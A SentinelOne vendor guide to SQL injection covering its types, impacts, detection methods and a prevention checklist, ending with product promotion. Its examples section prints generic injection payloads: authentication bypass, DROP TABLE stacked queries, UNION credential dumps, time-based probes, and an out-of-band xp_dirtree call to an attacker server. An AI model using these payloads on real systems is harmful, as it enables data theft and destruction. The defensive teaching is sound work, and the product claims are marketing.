What is SQL Injection? Examples & Prevention

This comprehensive guide explains what is SQL injection, how it works, and its potential impacts on your systems. Learn about various types of SQL injections and prevention strategies for businesses.
By SentinelOne September 30, 2024

Among all the different vulnerabilities that exist in web applications, SQL injection is considered one of the most dangerous as it has the potential to permit an attacker to gain unauthorized access to any of the precious data, all with just a few lines of maliciously written code. This can lead to leaks of customer information, financial records, and proprietary data that may result in some very serious consequences: data breaches, financial loss, and operational disruption. Incidentally, SQL injection has accounted for about 23% of the major vulnerabilities in web applications in 2023 around the world, therefore making industries quite vulnerable.

SQL injection risk for an organization cannot be overstated. As the business grows in dependence on web applications for vital functions, protecting the database from SQLi attacks starts to fall under the category of urgency. Possible repercussions of such an attack include financial loss, lawsuits, regulatory fines, and long-term reputational loss. Ensuring robust protection against SQL injection means assurance of continuity in operational security and business integrity.

In this article, we will break down what is SQL injection, how it works, its potential impacts, the different types of SQL injections, and, most importantly, how to prevent SQL injection attacks. By the end of this guide, you will have a complete understanding of how SQL injections operate, how hackers exploit these vulnerabilities, and how businesses can safeguard their web applications and databases.

What is SQL Injection (SQLi)?

SQL Injection (SQLi) is a security vulnerability that allows attackers to inject malicious SQL code into a web application’s input fields, which in turn manipulates the database. This usually occurs when inputs from the users are not sanitized properly and this allows for any damaging command to be run. For instance, instead of getting authentic details, an attacker can type SQL commands in the login space and compromise the network.

SQL injection vulnerabilities often arise in web applications where SQL queries are dynamically generated based on user input. But if an application unwarily relies on this input, then an attacker can freely run their choice of an SQL statement to pull data or make modifications to the database. Consequently, the attackers may get hold of personal data, change entries, or delete the database completely, with reckless consequences for the business.

One of the most alarming things about SQL injections is the fact that they are still widespread, even though it has been known to be this type of vulnerability for quite a while. According to the “State of the Internet” report 2020, SQLi comprises almost 80% of all the attacks against retail, travel, and hospitality web apps from 2018 to 2020.  Furthermore, web applications that allow user input to be passed through a login form, a search field, or directly through URLs are the most vulnerable to SQLi attacks. With SQL being used extensively, this shows a large attack surface; hence, organizations should pay special attention to securing these vulnerabilities.

Key Characteristics of SQL Injection:

  • User Input Exploitation: The attackers inject malicious SQL code in applications that do not sanitize or validate user input properly.
  • Database Manipulation: After successful SQL injection, the attackers manipulate the databases by modifying, deleting, or retrieving sensitive data, such as customer records or even financial information.
  • Multi-vector: SQLi may appear in one or more places on the Web application, such as login pages, search bars, or even URL parameters, providing the hacker with multiple vectors via which to successfully compromise the system.
  • Sensitive Data Access: After gaining unauthorized access, an attacker will extract critical information that may reveal a company’s important data or its customer’s private information.
  • Pervasive and Persistent: SQL injection continues to be pervasive in most industries, except for those that have to do with a lot of data transactions. If left without any security measures, there is a strong likelihood that organizations may suffer severe financial loss coupled with damage to reputation and possible litigation against them.

What is the Impact of a Successful SQL Injection Attack?

Any organization can attest to the fact that the aftermath of a successful attack using SQL injection is disastrous. Among many other potential consequences, stolen sensitive data, operational disruption, harm to reputation, and even legal actions might be involved when an attacker gains unauthorized access to a database using SQL injection. Let’s dig deeper:

  1. Data Theft: The immediate danger of an SQL injection attack includes data theft. That is, there are possibilities for an attacker to retrieve personally identifiable information, lists of usernames, passwords, financial records, and more. Stolen data can be sold on the dark web or used for identity theft and fraud. For businesses, data breaches often lead to enormous financial losses and lawsuits.
  2. Data Loss: Aside from data theft, the attackers can remove crucial information in the database. These include deleting customer information, financial records, and internal documents. Such loss always puts business activities in disarray and might lead to downtime. SQL injection attacks are rather expensive and time-consuming to recover when the proper backups have not been made.
  3. Reputational Damage: In the worst case, when customers find out that any type of SQL injection breach has been revealed, which includes information about them, they immediately lose trust. Customers would then leave or sue the platform, ruining the brand name in the eyes of the market. When customers lose all trust in a company, it may take many years to rebuild their reputation in the market.
  4. Regulatory fines: If an SQL injection attack results in lost sensitive data, businesses under strict data protection regulations, such as GDPR, HIPAA, or PCI DSS, can be levied with major fines. Besides these, there might be other sound regulatory bodies that may always use severe penalties, thus further increasing the cost of the security breach. In addition, organizations may also be compelled to notify all affected customers of the situation which could again apparently lead to even greater reputational damage.
  5. System Takeover: In some extreme cases, SQL injections can allow attackers to gain administrative control over or possession of the entire system. The attackers may also take complete control of the system, allowing them to manipulate the database, the application, and even the other connected systems. Such kinds of takeovers are catastrophic, where one needs to rebuild the system from scratch to make it functional again.

How Does an SQL Injection Attack Work?

Understanding how SQL injection works can help developers and businesses answer one of the most important questions, which is how to avoid SQL injection and protect their systems. Manipulation of poorly validated user input embedded into SQL queries interacting with the database is at the heart of an SQL injection attack. Here is how it works:

  1. Target Identification: During an attack, the attackers will identify a potential target, which could be a web application communicating with a back-end database. The attacker will look for input fields, URLs, or forms where data is sent to the server. Common targets include login pages, search bars, and contact forms in which user input is sent without ever being sanitized.
  2. Injecting Malicious Code: Once a vulnerability is identified, attackers inject malicious SQL code into the input field. Something as simple as adding “OR 1 = 1” — to a login form may bypass the authentication by tricking the application into accepting this as a valid query, hence manipulating how the database executes the SQL query.
  3. Execution of Malicious Code: In a case where the user’s input is not sanitized or validated by the application, the SQL code of an attacker gets executed by the database along with the valid query. This forms one of the ways attackers bypass security controls and, in most occurrences, provide direct access to sensitive information and may further modify records within the database.
  4. Data Utilization: After the attacker has injected and executed the malicious SQL code, they can then exploit the database in a variety of ways: stealing sensitive data, manipulating the database by way of insertion and deletion of records, and sometimes privilege escalation, which might give them administration over the whole system.

Types of SQL Injection

The SQL injection attacks may be different in terms of how the malicious code is injected and how the information to be extracted is actually extracted. Following are the four main types of SQL injection attacks that demand different ways of detection and prevention:.

  1. In-band SQL Injection: This is the type of SQL injection attack where the attacker injects malicious SQL commands and can view the results via the same communication channel. Example: An attacker puts SQL code into a search field and views the immediate results shown right on the webpage. This type of injection, for sure, is the easiest for hackers because it provides immediate feedback.
  2. Blind SQL Injection: In a blind SQL injection, the attacker does not receive immediate feedback from the database. Instead, they infer information from the application’s response or behavior. For example, an attacker might use conditional statements to determine whether certain data exists in the database based on the application’s response, even without direct access to the database output.
  3. Out-of-band SQL Injection: In out-of-band SQL injection, the attacker relies on a remote server to collect the malicious query results. Indeed, the attacker would set up another channel-say, HTTP or DNS-for exfiltrating data from the system being compromised rather than considering an immediate response. It is less common and generally more difficult to execute but really stealthy.
  4. Second-Order SQL Injection: This kind of attack occurs when the malicious code is injected and stored in the database for execution at a later time. The code will remain dormant until it is triggered by some other event, which in itself may be an administrative action. Second-order SQL injections are much harder to detect, given the fact that the attack happens way after the initial code injection; many times, it may also be hard to trace back to the original source.

How Hackers Exploit SQL Injection Vulnerabilities?

Hackers systematically look for and use vulnerabilities that can be exploited through SQL injection. Understanding their important methods can let businesses take more effective measures to defend against them. Here is how the hackers exploit SQLi vulnerabilities:

  1. Scanning of Vulnerabilities: Attackers usually start by scanning a web application for vulnerabilities. Tools automate this process in an attempt to find weak spots that may have fields accepting unsanitized input. This step helps the hacker identify potential entry points of an attack.
  2. Crafting Malicious Queries: Once hackers find a weak input field, they compose malicious SQL queries that aim to take advantage of the vulnerability. The query becomes designed in a way that can manipulate a database into executing commands not intended by the developer and granting the hacker data retrieval, modification, or deletion.
  3. Running SQL Code: Once the query is crafted, the attackers submit this query through the input fields available in the application. In case the application fails to validate such input properly, then the database executes the malicious code. This grants the attacker improper access to sensitive data or administrative controls.
  4. Privilege Escalation: After a successful SQL injection execution, some attackers look to increase their privileges. By manipulating the database, they can gain admin-level access that will grant them control over not only the database itself but even the whole system. They may install malware to gain access to other internal systems and cause even wider damage.

Effective Techniques to Prevent SQL Injection Attacks

Now, let us discuss how can we prevent SQL injection attacks. SQL injection attack prevention involves a positively engaged approach to maintaining the security of your web applications. The likelihood of an attack can significantly be brought to light with the implementation of the following techniques:

  1. Prepared Statements and Parameterized Queries: Probably the best way to avoid SQL injection attacks is by using prepared statements and parameterized queries. In this case, the SQL code is defined in advance, and the data provided by users would need to be treated only as data and never as executable code. That way, even when malicious input exists, it cannot affect the structure of the SQL command.
  2. Input Validation: Input validation ensures that the data entered by users adheres to the expected format. By setting strict rules for what types of data can be input (e.g., only allowing numbers in a price field), you can block potentially harmful inputs from reaching your database. Input validation is an essential layer of security in preventing SQL injections.
  3. Web Application Firewall or WAF: In easier terms, the WAF acts like a barrier between your application and the internet, filtering out malicious traffic. Using machine learning, modern WAFs are able to detect unusual patterns such as attempts at SQL injection, and block them before they reach your application.
  4. Data Sanitization: Data sanitization refers to cleaning the input data by removing or escaping special characters, such as quotation marks and semicolons, which can trigger SQL commands. When all user input is correctly sanitized, it removes the possibility of an attacker using special characters to execute malicious SQL queries.
  5. Least Privilege Access Principle: The principle of least privilege restricts the levels of access for users to those that are necessary. For this reason, the success rate of the SQL injection attack becomes minimal. An example would be that a user needing read permission within the database should not have any privileges enabling him to delete or alter records in the database.

How to Detect SQL Injection Vulnerabilities?

Proactive detection of SQL injection vulnerabilities protects your system. Some of the following methods can be used by businesses to find weak points in their web applications:

  1. Automated scanners: The automated scanning tools pretend to inject malicious SQL code into input fields, as in SQL injection attacks, and then analyze the response coming from the application. They are very effective in conducting a quick scan for large applications and reporting vulnerabilities. Some of the popular automated scanning tools available are Burp Suite, SQLMap, Acunetix, and OWASP ZAP, which involve the capability of identifying common vulnerabilities like SQL injection effectively. The limitation of automated scanning is that, though great as a first step toward the detection of security issues, there are several flaws. Complex vulnerabilities based on logic generally tend to be overlooked, and false positives are common, leading unnecessarily to remediation efforts. Automated scanning, therefore, needs to be complemented with other means.
  2. Manual Code Reviews: While automated scanners offer great speed, manual code reviews offer depth. Security experts can review the code to discover security vulnerabilities that may pass undetected by automated test tools, be it complex logic flaws or context-specific weaknesses. With an in-depth manual review, one can reveal very difficult potential attack vectors to detect via automation, such as improper use of user inputs across the application. However, all these are resource- and time-consuming activities. Therefore, you should integrate manual reviews with automated scanning tools rather than replacing them.
  3. Penetration Testing:  This form of security testing entails the hiring of professional hackers who simulate real-world SQL injection attacks on a live system. This approach provides a realistic, in-depth look into how well your web application withstands a targeted attack. This specifically includes penetration testing, which reveals problems that automated tools and manual reviews can miss, as it is an actual adversarial view of how vulnerabilities can be taken advantage of. While highly effective, it is also more expensive than other measures and requires specialized skills. Penetration testing is thus best suited for focused security evaluations rather than as a means of ongoing monitoring of the security of systems.
  4. Vulnerability Assessments: Performing regular vulnerability assessments is highly important in finding security gaps that may pop up in a web application, including SQL injections. On the other hand, vulnerability assessments involve greater depth checks than any automated scans, such as database configuration reviews, input validation practices, and user permissions. Fundamentally, assessments are performed on a schedule so that newly introduced vulnerabilities can be found as the codebases continue to evolve or when applications grow more complex. The regular performance of vulnerability assessment provides an organization with the opportunity to be updated about any emerging threats and/or attack vectors.
  5. Threat Analysis: Threat analysis involves identifying how potential attackers might take advantage of SQL injection vulnerabilities in the system. Threat modeling at F5 helps security teams identify the most likely attack vectors depending on the architecture of the application, where sensitive data resides, and via which user interaction is made to the system. This kind of analysis prioritizes vulnerabilities for remediation by considering the potential impact along with the likelihood of exploitation. Threat analysis can also be used in the identification of entry points of SQL injection, thus giving teams an idea of where efforts should be made.
  6. Tracking users’ behavioral patterns: Monitoring of user behavior is a pretty advanced form of security, whereby signs of an ongoing SQL injection attack can be detected. This form of security provides organizations with the ability to monitor user activities for deviation from the usual activity patterns. For instance, the organization may be able to recognize when legitimate contended user accounts are performing sensitive queries or handling sensitive areas of the database. These kinds of anomalies may suggest account compromise or successful SQL injection exploits. Tools for User Behavior Analytics (UBA) can flag these anomalies in real time, enabling intervention to take place immediately before major damage can occur. Behavioral monitoring forms a layer of security complementary to traditional vulnerability detection methods.

SQL Injection Prevention Checklist (Best Practices)

SQL Injection attacks can be prevented only through a proactive approach toward security, building multiple layers. Here’s a detailed checklist of best practices that can help protect your web applications and databases from these dangerous exploits:

#1. Use Prepared Statements and Parameterized Queries

What is it? Prepared statements segregate SQL code from user input, making the database interpret any input strictly as data and never as an executable command. Thus, this effectively restricts SQL injection attempts.

Why does this matter? Prepared statements keep user input safe by never allowing injected SQL commands from the user.

Actions to be taken: Never directly concatenate user inputs into SQL queries. On the other hand, application code should use parameterized queries when writing in Java or .NET or whatever languages it uses.

#2. Sanitize and Validate All User Inputs

What is it? Sanitization and validation of input are methods of testing user-supplied data to ensure it is in the correct format and removing possible harmful characters.

Why this is important? Attackers are frequently injecting hostile SQL by way of exploiting unsanitized inputs. Good input validation cuts this risk enormously.

Actions to be taken: INPUT validation will be forcefully implemented for all input fields, including login forms and URLs. This includes data types, and format verification; special character escaping that gives rise to any potential harm.

#3. Least Privilege Access:

What is it? Least privilege access permits only those privileges that are absolutely required to perform duties or functions. This will then further reduce the damage a breach can cause.

How does this help? Reducing database privileges can ensure that even in the case where an attacker manages to perform SQLi, he/she cannot view or alter information outside his/her designated boundaries.

Actions to be taken: Permissions in the database must be checked regularly to ensure minimum privileges are granted. Admin access should be locked down to only those users that need it.

#4. WAF: Web Application Firewall

What is it? A Web Application Firewall is a device that cleans and monitors HTTP requests; it blocks malicious traffic, such as SQL injection attempts, from ever reaching your application.

What’s the benefit? WAFs add an extra layer of defense, inspecting incoming traffic for known SQL injection attack patterns and blocking in real time.

Actions to be taken: Deploy a WAF that can block SQLi attempts. Configure the WAF to detect known SQL injection techniques and anomalous traffic behavior.

#5. Conduct Regular Security Audits

What is it? A security audit means testing an application against common security practices, codes, and configurations in order to detect potential vulnerabilities.

Why is this important? Having regular auditing ensures that the newly introduced vulnerabilities are fixed before the attackers can get a chance to start taking advantage of them.

Actions to be taken: Schedule automated scans and frequent manual reviews. Include SAST, DAST, and other tools for penetration testing in audits.

#6. Execute Threat Modeling and Vulnerability Assessments

What is it? Threat modeling means emulating an attacker’s approach to identify the possible attack vectors, while vulnerability assessment means active pursuit in search of security gaps put into focus and resolved.

How does this help? Threat modeling helps you prioritize what the most critical vulnerabilities are so you can take proactive steps to address them.

Actions to be taken: Include threat modeling in your development lifecycle. You will need to run periodic vulnerability assessments for the timely identification of threats and their effective mitigation before those could be utilized by any attacker.

#7. Anomaly Detection of User Behavior

What is it? User Behavior Analytics (UBA) tools track user activities and alert on anomalies, such as queries that nobody normally executes, to indicate a compromise or attempted SQLi.

Why monitor behavior? An abnormal user can be identified earlier in the detection of SQL injection attacks to prevent further damage.

Actions to be taken: Implement UEBA tools to monitor user activities, mark suspicious behavior, and investigate to verify whether there is an active attack in progress.

#8. Limit and Paginate Queries

What is it? Limit and pagination further limit the number of records returned by a database query and are useful in preventing mass data extraction if there is an SQL injection.

How does that defend you? That keeps the attackers that may have succeeded in running a malicious query from retrieving oodles of data since it limits the number of rows returned.

Actions to be taken: Use SQL LIMIT and OFFSET clauses to limit the quantity of data each query returns. Limiting what an attacker is able to query limits the potential damage from a successful attack.

#9. Keep Software Up-to-Date and Patched

What is it? Regular software updating means that the known vulnerabilities are patched. This, in turn, makes the system less vulnerable to attacks.

Why update often? So many SQLi vulnerabilities come from unpatched software. Keeping your systems up to date closes potential attack vectors.

Actions to be taken: Develop a patch management strategy that will deliver uniform web application updates, library updates, and database system updates to their latest secure versions.

SQL Injection Examples

SQL injection is one of the most common but dangerous vulnerabilities that allow an attacker to manipulate database queries by injecting malicious SQL code via user input. Understandably, for developers and security professionals to develop an appropriate form of defense, they must understand the different types of SQL injection. The following are some examples of techniques related to SQL injection, each with distinct methods of exploitation.

1. Authentication as an Administrator

Such an attack involves tampering by an attacker with a form to evade authentication checks. With the injection of ‘password’ OR 1=1, the query becomes SELECT id FROM users WHERE username=’user’ AND password=’password’ OR 1=1. Because 1=1 is true always, the attacker gets administrator access, hence bypassing the requirement of valid credentials. This attack proves the vulnerability that develops in neglect of using parameterized queries.

2. Access to Sensitive Information

SQL may be injected into a query to retrieve sensitive data from the database. As an example, the injection of ‘Widget’ OR 1=1 to a product search query like SELECT * FROM items WHERE owner = ‘John’ AND item name = ‘Widget’ OR 1=1 forces the database to return all rows. It is easy to see that this defeats restrictions to unauthorized access to confidential data.

3. Stacked Queries for Deletion

A stacked query attack is one where more than one query is executed at once. For example, with the injection of 20; DROP TABLE Products; an attacker would have turned such a query as SELECT * FROM Products WHERE product_id = 20 to one that would delete the entire product table. This shows the danger of allowing more than one SQL statement to execute at once.

4. Union-Based Attack

The attacker can use the UNION operator to combine multiple query results. For this, an attacker can alter any product query like SELECT name, price FROM products WHERE category = ‘shoes’ by adding UNION ALL SELECT username, password FROM users —. This query will dump the usernames and passwords along with the product information.

5. Blind SQL Injection

In Blind SQL injection, the attackers do not have direct access to query results but can infer information through the application behavior. Suppose this query: SELECT FROM users WHERE id = ‘$id’ AND IF((SELECT COUNT() FROM users)>10, SLEEP(5), 0); If the page takes more time to respond, it will show that the condition is true. By this, even if an attacker does not see the output, he may get knowledge about the database sets.

6. Error-Based SQL Injection

This attack uses database error messages in order to obtain information. For instance, a query like the one below: SELECT * FROM products WHERE id = 1 AND CONVERT(INT, (SELECT @@version)); – can force an error message that reveals either the SQL version or structural information about the database. These hints can supply the attacker with information to devise subsequent exploits.

7. Boolean-Based SQL Injection

Boolean-based SQL injection is a type of blind SQL injection in which one attempts to retrieve information through true/false conditions. An example looks like this: SELECT * FROM users WHERE id = ‘$id’ AND ‘1’=’1′; If this query returns a result but the same query with ‘1’=’0′ doesn’t, they know the injection worked. This approach applies if there’s no visible output to the attacker.

8. Time-Based Blind SQL Injection

Time-based blind SQL injection depends on time delays to deduce its inference about the results of a query. Example: SELECT * FROM users WHERE id = 1 AND IF(1=1, SLEEP(5), 0); If the page loads in a longer manner than usual, then that would be the adversary’s conclusion that the query was completed successfully. This is usually executed when error messages or any other form of visible feedback is not available.

9. Second-order SQL Injection

This happens in the case when some malicious input is stored somewhere, and after some time, it gets executed in some other database operation. Example: John’); DROP TABLE users;– If this input is stored and then executed in another query without proper validation, it could lead to major damage, like dropping a critical table.

10. Out-of-Band SQL Injection

In this type of attack, information disclosure is realized through external channels such as HTTP or DNS requests. Example: SELECT * FROM users WHERE id = 1; EXEC xp_dirtree ‘\\attacker-server\share’; This query will, in turn, send a request to a server controlled by the attacker, hence indirectly extracting data. In the case of out-of-band injection, the database has to enable the outbound connections.

11. Stored Procedure SQL Injection

SQL injection targets the stored procedures themselves. A good example of this follows in this stored procedure: CREATE PROCEDURE GetUserData @username NVARCHAR(50) AS EXEC(‘SELECT * FROM users WHERE username = ”’ + @username + ””); The input could be ‘ OR ‘1’=’1’ and trick the query. If inputs to stored procedures aren’t properly sanitized, they might be just as vulnerable as inline SQL queries.

Why Use SentinelOne to Combat SQL Injection Attacks?

SentinelOne uses advanced AI-powered and Machine Learning algorithms to observe SQL injection attacks and acquire details about targeted databases. It conducts log hunts and threat analysis by running hunting queries and investigating multiple attack scenarios.

The platform can combat every attack, at every stage of the threat lifecycle. It fights SQL injection attacks in the following ways:

SentinelOne monitors every access, connection, system call, and network environment. It gives you a complete overview of your cloud estate and prevents adversaries from injecting malicious code into your apps and services.

You can add industry-leading spatial intelligence to your security stack, prevent single-vendor tunnel vision, and reduce consolidation-driven risks. Scale up or down your security and protect any surface, be it cloud, identity, or endpoint.

SentinelOne provides these core offerings to supercharge your cyber and cloud security:

  • Singularity™ Cloud Native Security – A unique agentless CNAPP solution that ensures zero false positives. It enhances your team’s efficiency by leveraging a unique offensive engine with Verified Exploit Paths™. It also identifies more than 750+ different types of hard-coded secrets. SentinelOne’s CNAPP includes Cloud Detection & Response (CDR), Infrastructure as Code (IaC) Scanning, Cloud Security Posture Management (CSPM), and more. You will get support from major cloud services providers such as AWS, Azure, GCP, OCI, DigitalOcean, and Alibaba Cloud.
  • Singularity™ Endpoint – SentinelOne Singularity™ Endpoint provides superior visibility, enterprise-grade protection, and intelligent response across all endpoints, servers, and mobile devices. It centralizes data and workflows for cloud estates and accelerates responses to malware, ransomware, and any other emerging threats. You can remediate and roll back endpoints with a single click, reduce mean times to respond, and speed up investigations with RemoteOps. SentinelOne Singularity™ Endpoint also includes Singularity Ranger which is a real-time network attack surface control solution that finds and fingerprints all IP-enabled devices on your network.
  • Singularity™ Cloud Workload Security – Singularity™ Cloud Workload Security uses AI-powered defenses to secure cloud workloads, VMs, containers, servers, and private cloud environments. It detects and remediates fileless attacks, ransomware, and zero-days in real time. You get full forensic visibility of your cloud workload telemetry and support for 15 Linux distros, 20 years of Windows servers, 3 container runtimes, and Kubernetes. There is auto-scaling for the CWPP for self-managed and managed K8s. It also features Snyk integration for the closed-loop resolution of runtime threats across your workload source code.

There are also other products like Purple AI, AI-SIEM, Singularity™ Identity, and Singularity™ Data Lake that can collect insights and transform them into actionable threat intelligence. Overall, SentinelOne gives you all the tools and workflows you need to spot SQL injection attacks, see them coming from miles away, and prevent them. It can predict and prevent future SQL threats too.


Ultimately, SQL injection remains one of the most serious security threats to both web applications and databases. Poor Input Validation, Weak Query Handling, and outdated security practices contribute to making these types of attacks common even for such a well-known vulnerability. A successful SQL injection attack might lead to anything from stolen data to financial loss, reputation issues, and even legal repercussions. Therefore, it becomes quite an important thing for companies to include in comprehensive security measures, like prepared statements, input validation, and Web Application Firewalls.

Every organization should take SQL injection vulnerabilities very seriously, especially when sensitive customer data is handled. By following the best practices in this article, frequent security audits, and teaching developers safe coding practices, businesses can reduce the chances of becoming a victim of SQL injection attacks.


1. Why should I care about SQL injection attacks?

The consequences of SQL injection attacks go far beyond merely injecting malicious code into your enterprise. When attackers harvest and steal your users’ credentials, they gain unauthorized access to sensitive databases, servers, and other resources. They may escalate privileges, reveal confidential information, or sell your data on the dark web. The implications extend far into the future and it comprises the reputation and integrity of your organization.

2. What are the best tools for fighting against SQL injections?

We recommend using Singularity™ Platform to combat SQL injection threats. It features enterprise-wide protection and includes all the tools and features you need for autonomous response, unfettered visibility, and industry-leading detection.

3. How can I prevent SQLi attacks?

You can prevent SQLi attacks by using allow lists or whitelisting and conducting continuous vulnerability scanning and penetration tests. Deploy web application firewalls (WAF), adopt the least principle privilege access, and apply input validation and sanitization processes.

4. What should I do after I fall victim to an SQL injection attack?

Limit the scope of the damage and focus on containing the threat. Re-enable your infrastructure, fix web pages/commands with detected vulnerabilities, and shut down infected services. Restore lost data from your recent backups and use an advanced threat detection solution like SentinelOne to pinpoint the attack’s origin and remediate it.

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